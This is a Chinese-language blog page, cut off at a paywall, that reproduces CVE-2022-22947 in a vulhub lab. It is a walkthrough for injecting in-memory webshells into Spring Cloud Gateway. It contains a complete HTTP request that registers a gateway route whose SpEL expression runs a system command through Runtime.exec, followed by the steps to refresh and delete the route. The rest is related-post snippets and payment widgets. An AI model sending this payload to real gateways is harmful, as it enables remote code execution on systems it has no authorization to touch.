Spring Cloud gateway 三种方式注入内存马(详细过程)

已于 2023-04-19 02:22:21 修改
阅读量1.1k 收藏
点赞数
文章标签: spring boot java 网络安全 web安全
于 2023-04-19 02:20:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pyth0zn/article/details/130234277
版权
本文详述了在Spring Cloud Gateway中利用SPEL注入内存马的三种方法,包括c0ny1的Netty内存马、Spring内存马和哥斯拉马的实现过程。在复现过程中,作者强调了类路径的准确性、使用Java 1.8编译字节码以确保兼容性,并分享了相关资源链接。
摘要由CSDN通过智能技术生成

申明

  免责声明:本文为个人作品,只做技术研究,只可用于正常的技术交流与学习,不可用于灰黑产业,不可从事违法犯罪行,严禁利用本文所介绍的技术进行未授权的恶意攻击,否则,后果自负!!!

一:背景

     之前打攻防的时候,内网遇到了Spring Cloud gateway,照着网上的代码,一下午就是搞不定,当时由于时间紧,就放弃了(实际上是自己菜),现在闲下来, 用一下午时间把三种方式都复现成功了。这里记录下过程及坑点

二:过程

首先漏洞环境就是用的vulhub上面的 docker,连接在下面

https://vulhub.org/#/environments/spring/CVE-2022-22947/

docker启动后访问页面如下

 先来按照vulhub的payload 打一遍试试

首先注册一个路由,这个路由的值,用SpEL表达式执行代码

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 172.27.250.78:8080
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

 添加路由成功后,服务器返回201

 此时路由还未生效,我们需要刷新下路由

 刷新完路由,查看下路由列表,发现代码已经执行了

最后我们删除这条路由

 这样就算是完成了一次利用,每次执行命令都要注册路由,刷新路由,很是麻烦,下面根据网上的大佬们改造

1:首先当然是c0ny1的netty内存马

具体请看如下链接

Spring cloud gateway通过SPEL注入内存马 | 回忆飘如雪

我本地是起了一个springboot的maven项目好引入相关依赖,主要是下面这两个包


                

        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  pyth0nn
                
              
            

            

                关注
              
            

        

        

          
      

      









                



	

		

			

				
					
论如何优雅的注入Java Agent内存

				
			

			

				

					AS011x的博客
				

				

					08-19
					
					758
					
				

			

		

		

			
				
• 回顾• 优雅的构造JPLISAgent• Windows平台• Linux平台• 获取JVMTIEnv指针• 组装JPLISAgent• 动态修改类• Windows平台• Linux平台• 植入内存• 后记• 参考。

			
		

	



                

              
                



	

		

			

				
					
TemplatesImpl利用链与Fastjson注入内存

				
			

			

				

					weixin_42508548的博客
				

				

					01-31
					
					1098
					
				

			

		

		

			
				
TemplatesImpl利用链是一个非常重要的东西,要知道,CC链可以用它,CB链也用它,注入内存还是用它。因为它可以加载java字节码并实例化。ClassLoader,类加载器,是JVM执行类加载机制的前提,其主要任务为根据一个类的全限定名来读取此类的二进制字节流到JVM内部,然后转换为一个与目标类对应的java.lang.Class对象实例。文章第四部分,了解了实例化类的时候,会自动执行static{}代码块,{}代码块,无参构造方法那么如何注入内存呢,也是通过newInstance实现。

			
		

	



                


  
              

                


	

		

			

				
					
CVE-2022-22947-Spring-Cloud-Gateway 内存POC

				
			

			

				

					03-29
				

			

		

		

			
				
1.漏洞描述

        Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
2.影响版本

3.1.0

3.0.0至3.0.6

Spring Cloud Gateway 其他已不再更新的版本

			
		

	





	

		

			

				
					
springboot gateway命令执行漏洞复现(CVE-2022-22947)+内存

				
			

			

				

					qq_61860998的博客
				

				

					06-22
					
					1698
					
				

			

		

		

			
				
springboot gateway命令执行+内存

			
		

	



		

			
		



	

		

			

				
					
CVE-2022-26134 Confluence 无文件落地的内存注入姿势

				
			

			

				

					qq_40466372的博客
				

				

					07-06
					
					5634
					
				

			

		

		

			
				
CVE-2022-26134 Confluence 无文件落地的内存注入

			
		

	





	

		

			

				
					
【189期】利用 Fastjson 注入 Spring MVC 内存,太秀了~!

				
			

			

				

					Java精选
				

				

					12-04
					
					460
					
				

			

		

		

			
				
点击上方“Java精选”,选择“设为星标”别问别人为什么,多问自己凭什么!下方有惊喜,留言必回,有问必答!每天08:35更新文章,每天进步一点点...1、基础实际上java内存注入...

			
		

	





	

		

			

				
					
spring cloud gateway 例子

				
			

			

				

					01-22
				

			

		

		

			
				
Spring Cloud Gateway 是一款基于 Spring Framework 5 和 Spring Boot 2 设计的云原生微服务网关,它旨在提供一种简单而有效的方式来对 API 进行路由,同时提供了过滤器功能,可以进行权限验证、限流、日志记录等...

			
		

	





	

		

			

				
					
SpringCloud Gateway跨域配置代码实例

				
			

			

				

					08-25
				

			

		

		

			
				
在本文中,我们将详细介绍 SpringCloud Gateway 跨域配置代码实例。跨域配置是指在不同的源之间共享资源时,如何配置服务器以允许跨域请求。SpringCloud Gateway 提供了强大的跨域配置功能,通过配置可以实现跨域...

			
		

	





	

		

			

				
					
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞复现

				
			

			

				

					12-26
				

			

		

		

			
				
本文将详细探讨一个重要的安全问题——Spring Cloud Gateway Actuator API 的SpEL(Spring Expression Language)表达式注入漏洞(CVE-2022-22947),该漏洞可能导致命令执行,对系统安全构成严重威胁。首先,我们...

			
		

	





	

		

			

				
					
内存注入工具

				
			

			

				

					07-25
				

			

		

		

			
				
用途很广的内存注入工具用途很广的内存注入工具,一直留着

			
		

	





	

		

			

				
					
Sangfor华东天勇战队:CVE-2022-22947注入Spring内存

				
			

			

				

					bring_coco的博客
				

				

					06-26
					
					1695
					
				

			

		

		

			
				
中间的这一段’yv66vgAAA…'需要将class文件进行base64编码,如下。编译成SpringRequestMappingMemshell.class即可。刷新之后可以看到成功注册路由,也就相当于我们的内存写了进去。接下来执行内存,可以直接访问接口并输入命令,如下。

			
		

	





	

		

			

				
					
内存实战(持续更新中)

				
			

			

				

					qq_44657899的博客
				

				

					05-16
					
					1644
					
				

			

		

		

			
				
计划
复现以下框架的内存注入:

 shiro(aes base64 加密)
 普通内存
 冰蝎
 WebSocket
 xxl-job
 filter
 冰蝎
 netty内存
 agent内存
 JNDI(字节码里执行)
 SpringBoot spel表达式注入spring cloud gateway)
 Struts2的ognl表达式注入
 Tomcat的EL表达式注入

参考:https://gv7.me/articles/2022/the-spring-cloud-gatewa

			
		

	





	

		

			

				
					
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)

					
最新发布

				
			

			

				

					m0_63299551的博客
				

				

					06-24
					
					404
					
				

			

		

		

			
				
这里在burp抓包时要将burp代理地址改为本机地址要不然会抓不到 127.0.0.1的数据包。接着创建application.yml文件 具体步骤和代码如下。将pom.xml文件替换成下面所写的。接着配置maven 这里参考了一篇文章。可以看到环境搭建成功 接着进行漏洞复现。

			
		

	





	

		

			

				
					
spring打入filter内存+冰蝎成功

				
			

			

				

					bring_coco的博客
				

				

					08-29
					
					1545
					
				

			

		

		

			
				
注意springboot版本过高注入失败,会报错。springboot版本2.4.5。可以看的spring内存注入成功。fastjson版本1.2.24。我们版本不变,换个内存再打一遍。Test.java内存)可以看到报错了,报错为。

			
		

	





	

		

			

				
					
win10 x64实现内存注入DLL

				
			

			

				

					weixin_41725706的博客
				

				

					11-29
					
					2400
					
				

			

		

		

			
				
win10 x64内存注入DLL,可以躲避相关api检测模块

			
		

	





	

		

			

				
					
Windows注入与拦截(6) -- 从内存中加载DLL

					
热门推荐

				
			

			

				

					while(1) { smile(); }
				

				

					04-09
					
					4万+
					
				

			

		

		

			
				
Windows提供的API(LoadLibrary, LoadLibraryEx)只支持从文件系统上加载DLL文件,我们无法使用这些API从内存中加载DLL。

但是有些时候,我们的确需要从内存中加载DLL,比如:


对发布的文件数量有限制。我们可以将DLL打包到exe的资源中,程序运行时从调用LoadResource等API读取DLL文件到内存中,然后从内存中加载DLL。
需要对DLL进行压缩...

			
		

	





	

		

			

				
					
[Java安全]Spring SPEL注入总结&回显技术

				
			

			

				

					2301_80115097的博客
				

				

					10-24
					
					1306
					
				

			

		

		

			
				
在SpEL表达式中,变量定义通过EvaluationContext类的setVariable(variableName, value)函数来实现;在表达式中使用”#variableName”来引用;#this:使用当前正在计算的上下文;#root:引用容器的root对象;@something:引用Bean。

			
		

	





	

		

			

				
					
请使用Java代码 实现springcloud gateway 拦截xss和sql注入

				
			

			

				

					02-23
				

			

		

		

			
				

可以使用Spring Security这个开源框架来实现springcloud gateway拦截XSS和SQL注入:@Configuration
public class SecurityConfig extends WebSecurityConfigurerAdapter {    @Override
    protected void configure(HttpSecurity http) throws Exception {
        http.csrf().disable()
            .addFilterBefore(new XssFilter(), CsrfFilter.class)
            .addFilterBefore(new SqlInjectionFilter(), CsrfFilter.class);
    }
}

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
pyth0nn

			
送人玫瑰,手留余香

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值